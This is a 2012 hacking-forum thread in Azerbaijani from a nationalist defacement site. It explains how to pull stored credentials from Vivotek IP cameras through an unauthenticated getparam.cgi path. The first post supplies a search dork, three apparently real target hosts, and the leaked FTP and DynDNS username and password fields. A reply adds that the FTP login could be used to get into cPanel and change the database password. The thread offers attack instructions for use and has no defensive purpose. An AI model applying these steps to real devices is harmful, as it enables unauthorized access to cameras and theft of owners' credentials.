Anti-armenia.ORG - Forumlar - Vivotek DB Oğurlamaq



Istifadəçi
     2012-07-12 22:06 GMT                 

G0ldpr3m1um


VIP
Mesaj Sayı : 560
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   10  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : G0ldpr3m1um
Yaş :
Mesaj :

Mövzunu Paylaş!


Vivotek DB Oğurlamaq

Exploit: /cgi-bin/admin/getparam.cgi


Dork: "/setup/config.html" ||allinurl:"setup/parafile.html"


məsələn:

http://syaruru02.dyndns.org:8080/cgi-binn/getparam.cgi
http://camp2.homeunix.com/cgi-bin/admin/getparam.cgi
http://80.243.38.119/cgi-bin/admin/getparam.cgi

DB Nin Olduğu yer buradır sayta girib buranı axtarın.

[Sensitive data]
FTP ACCOUNTS: server_i0_ftp_address='FTPADDRESS'
server_i0_ftp_username='FTPUSERNAME'
server_i0_ftp_passwd='FTPPASSWD'

DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname='hostname'
ddns_DyndnsDynamic_usernameemail='usernameemail'
ddns_DyndnsDynamic_passwordkey='passwordkey'

Alıntıdır

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
     
 

Istifadəçi
     2012-07-20 00:28 GMT                 

Avatar Fearless


VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Gözəl Tapıntıdır. Yani 1az Diqqət etsək Sən DB Oğurlamaq Yazmısan amma bu 1 növ FTP deyim DB deyim qarışıqdı.
Kod:
[Sensitive data]
FTP ACCOUNTS: server_i0_ftp_address='FTPADDRESS'
server_i0_ftp_username='FTPUSERNAME'
server_i0_ftp_passwd='FTPPASSWD

Burda FTP username FTP Pass yazır Yani FTP-dir. Gəlki Cpanel-dən DB adın öyrənib Pass-ı dəyişib DB-də oğurlamaq olar amma uje ona ehtiyac qalmaz deyə düşünürəm. Təşəkkürlər Maraqlı Yol

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG